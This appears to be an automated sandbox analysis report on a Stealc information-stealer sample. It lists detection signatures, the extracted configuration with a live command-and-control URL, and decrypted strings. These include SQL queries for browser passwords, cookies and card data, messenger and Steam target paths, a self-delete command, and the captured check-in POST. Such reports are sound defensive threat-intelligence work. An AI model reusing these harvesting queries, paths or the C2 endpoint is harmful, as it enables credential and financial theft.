Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546617
MD5: caff2fe6c91944cca73634bb9b591335
SHA1: f449657c2b9733b3cd2b90b7320097902f9a94c9
SHA256: 68765aa962ddcffd239f27e69605d71138b54d35ed5fd9f36b7e33b0b672ab34
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5960 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CAFF2FE6C91944CCA73634BB9B591335)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1239089821.0000000004E10000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 5960 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 5960 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Source | Rule | Description | Author | Strings
0.2.file.exe.a30000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T08:52:19.231782+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.7 | 49720 | TCP
2024-11-01T08:52:57.975035+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.7 | 49944 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T08:52:05.984629+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49699 | 185.215.113.206 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.a30000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 0.2.file.exe.a30000.0.unpack | String decryptor (one decrypted string per line):
    INSERT_KEY_HERE
    30
    11
    20
    24
    GetProcAddress
    LoadLibraryA
    lstrcatA
    OpenEventA
    CreateEventA
    CloseHandle
    Sleep
    GetUserDefaultLangID
    VirtualAllocExNuma
    VirtualFree
    GetSystemInfo
    VirtualAlloc
    HeapAlloc
    GetComputerNameA
    lstrcpyA
    GetProcessHeap
    GetCurrentProcess
    lstrlenA
    ExitProcess
    GlobalMemoryStatusEx
    GetSystemTime
    SystemTimeToFileTime
    advapi32.dll
    gdi32.dll
    user32.dll
    crypt32.dll
    ntdll.dll
    GetUserNameA
    CreateDCA
    GetDeviceCaps
    ReleaseDC
    CryptStringToBinaryA
    sscanf
    VMwareVMware
    HAL9TH
    JohnDoe
    DISPLAY
    %hu/%hu/%hu
    http://185.215.113.206
    bksvnsj
    /6c4adf523b719729.php
    /746f34465cf17784/
    tale
    GetEnvironmentVariableA
    GetFileAttributesA
    GlobalLock
    HeapFree
    GetFileSize
    GlobalSize
    CreateToolhelp32Snapshot
    IsWow64Process
    Process32Next
    GetLocalTime
    FreeLibrary
    GetTimeZoneInformation
    GetSystemPowerStatus
    GetVolumeInformationA
    GetWindowsDirectoryA
    Process32First
    GetLocaleInfoA
    GetUserDefaultLocaleName
    GetModuleFileNameA
    DeleteFileA
    FindNextFileA
    LocalFree
    FindClose
    SetEnvironmentVariableA
    LocalAlloc
    GetFileSizeEx
    ReadFile
    SetFilePointer
    WriteFile
    CreateFileA
    FindFirstFileA
    CopyFileA
    VirtualProtect
    GetLogicalProcessorInformationEx
    GetLastError
    lstrcpynA
    MultiByteToWideChar
    GlobalFree
    WideCharToMultiByte
    GlobalAlloc
    OpenProcess
    TerminateProcess
    GetCurrentProcessId
    gdiplus.dll
    ole32.dll
    bcrypt.dll
    wininet.dll
    shlwapi.dll
    shell32.dll
    psapi.dll
    rstrtmgr.dll
    CreateCompatibleBitmap
    SelectObject
    BitBlt
    DeleteObject
    CreateCompatibleDC
    GdipGetImageEncodersSize
    GdipGetImageEncoders
    GdipCreateBitmapFromHBITMAP
    GdiplusStartup
    GdiplusShutdown
    GdipSaveImageToStream
    GdipDisposeImage
    GdipFree
    GetHGlobalFromStream
    CreateStreamOnHGlobal
    CoUninitialize
    CoInitialize
    CoCreateInstance
    BCryptGenerateSymmetricKey
    BCryptCloseAlgorithmProvider
    BCryptDecrypt
    BCryptSetProperty
    BCryptDestroyKey
    BCryptOpenAlgorithmProvider
    GetWindowRect
    GetDesktopWindow
    GetDC
    CloseWindow
    wsprintfA
    EnumDisplayDevicesA
    GetKeyboardLayoutList
    CharToOemW
    wsprintfW
    RegQueryValueExA
    RegEnumKeyExA
    RegOpenKeyExA
    RegCloseKey
    RegEnumValueA
    CryptBinaryToStringA
    CryptUnprotectData
    SHGetFolderPathA
    ShellExecuteExA
    InternetOpenUrlA
    InternetConnectA
    InternetCloseHandle
    InternetOpenA
    HttpSendRequestA
    HttpOpenRequestA
    InternetReadFile
    InternetCrackUrlA
    StrCmpCA
    StrStrA
    StrCmpCW
    PathMatchSpecA
    GetModuleFileNameExA
    RmStartSession
    RmRegisterResources
    RmGetList
    RmEndSession
    sqlite3_open
    sqlite3_prepare_v2
    sqlite3_step
    sqlite3_column_text
    sqlite3_finalize
    sqlite3_close
    sqlite3_column_bytes
    sqlite3_column_blob
    encrypted_key
    PATH
    C:\ProgramData\nss3.dll
    NSS_Init
    NSS_Shutdown
    PK11_GetInternalKeySlot
    PK11_FreeSlot
    PK11_Authenticate
    PK11SDR_Decrypt
    C:\ProgramData\
    SELECT origin_url, username_value, password_value FROM logins
    browser:
    profile:
    url:
    login:
    password:
    Opera
    OperaGX
    Network
    cookies
    .txt
    SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
    TRUE
    FALSE
    autofill
    SELECT name, value FROM autofill
    history
    SELECT url FROM urls LIMIT 1000
    cc
    SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
    name:
    month:
    year:
    card:
    Cookies
    Login Data
    Web Data
    History
    logins.json
    formSubmitURL
    usernameField
    encryptedUsername
    encryptedPassword
    guid
    SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
    SELECT fieldname, value FROM moz_formhistory
    SELECT url FROM moz_places LIMIT 1000
    cookies.sqlite
    formhistory.sqlite
    places.sqlite
    plugins
    Local Extension Settings
    Sync Extension Settings
    IndexedDB
    Opera Stable
    Opera GX Stable
    CURRENT
    chrome-extension_
    _0.indexeddb.leveldb
    Local State
    profiles.ini
    chrome
    opera
    firefox
    wallets
    %08lX%04lX%lu
    SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName
    x32
    x64
    %d/%d/%d %d:%d:%d
    HARDWARE\DESCRIPTION\System\CentralProcessor\0
    ProcessorNameString
    SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
    DisplayName
    DisplayVersion
    Network Info:
    - IP: IP?
    - Country: ISO?
    System Summary:
    - HWID:
    - OS:
    - Architecture:
    - UserName:
    - Computer Name:
    - Local Time:
    - UTC:
    - Language:
    - Keyboards:
    - Laptop:
    - Running Path:
    - CPU:
    - Threads:
    - Cores:
    - RAM:
    - Display Resolution:
    - GPU:
    User Agents:
    Installed Apps:
    All Users:
    Current User:
    Process List:
    system_info.txt
    freebl3.dll
    mozglue.dll
    msvcp140.dll
    nss3.dll
    softokn3.dll
    vcruntime140.dll
    \Temp\
    .exe
    runas
    open
    /c start
    %DESKTOP%
    %APPDATA%
    %LOCALAPPDATA%
    %USERPROFILE%
    %DOCUMENTS%
    %PROGRAMFILES%
    %PROGRAMFILES_86%
    %RECENT%
    *.lnk
    files
    \discord\
    \Local Storage\leveldb\CURRENT
    \Local Storage\leveldb
    \Telegram Desktop\
    key_datas
    D877F783D5D3EF8C*
    map*
    A7FDF864FBC10B77*
    A92DAA6EA6F891F2*
    F8806DD0C461824F*
    Telegram
    Tox
    *.tox
    *.ini
    Password
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
    00000001
    00000002
    00000003
    00000004
    \Outlook\accounts.txt
    Pidgin
    \.purple\
    accounts.xml
    dQw4w9WgXcQ
    token:
    Software\Valve\Steam
    SteamPath
    \config\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: ssfn*
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: config.vdf
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: DialogConfig.vdf
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: libraryfolders.vdf
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: loginusers.vdf
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: done
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: https
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: build
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: token
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: file
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: message
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A49030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A372A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3A2B0 CryptUnprotectData,LocalAlloc,LocalFree
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
                Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1239089821.0000000004E3B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1239089821.0000000004E3B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

                Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49699 -> 185.215.113.206:80
                Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCB Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 38 38 32 39 38 44 31 41 42 45 32 30 39 39 39 32 35 32 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="hwid"5F88298D1ABE2099925286------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="build"tale------AAKKKEBFCGDBGDGCFHCB--
                Source: Joe Sandbox View IP Address: 185.215.113.206
                Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
                Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.7:49720
                Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.7:49944
                Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A362D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
                Source: unknown HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCB Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 38 38 32 39 38 44 31 41 42 45 32 30 39 39 39 32 35 32 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="hwid"5F88298D1ABE2099925286------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="build"tale------AAKKKEBFCGDBGDGCFHCB--
                Source: file.exe, 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1283384849.0000000001344000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php//
                Source: file.exe, 00000000.00000002.1283384849.0000000001344000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpID
                Source: file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpJ
                Source: file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpLMEM
                Source: file.exe, 00000000.00000002.1283384849.0000000001344000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpQD
                Source: file.exe, 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpft
                Source: file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/sonation
                Source: file.exe, file.exe, 00000000.00000003.1239089821.0000000004E3B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                Source: file.exe Static PE information: section name:
                Source: file.exe Static PE information: section name: .rsrc
                Source: file.exe Static PE information: section name: .idata
                Source: file.exe Static PE information: section name:
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A70098
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E211C5
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A8B198
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A62138
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E0E100
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DD82FC
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A74288
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E8E2AE
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A9E258
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AAD39E
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ABB308
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9D301
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E8D4FA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A9D5A8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A745A8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A54573
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A5E544
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DE26D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB96FD
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A766C8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AAA648
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AA6799
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A8D720
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A8B8A8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A898B8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9B89D
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A9F8D6
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A84868
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E96831
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E1383A
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D8C963
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AA4BA8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AA0B88
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A98BD9
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AAAC28
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F14C7F
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E8FDE8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A85DB9
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A84DC8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E99D69
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E94D6F
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A9AD38
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A8BD68
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A61D78
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AA1EE8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A78E78
                Source: C:\Users\user\Desktop\file.exe Code function: String function: 00A34610 appears 316 times
                Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exe Static PE information: Section: rcutauay ZLIB complexity 0.994974856856038
                Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A43970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
                Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\MTRP2XE4.htm
                Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
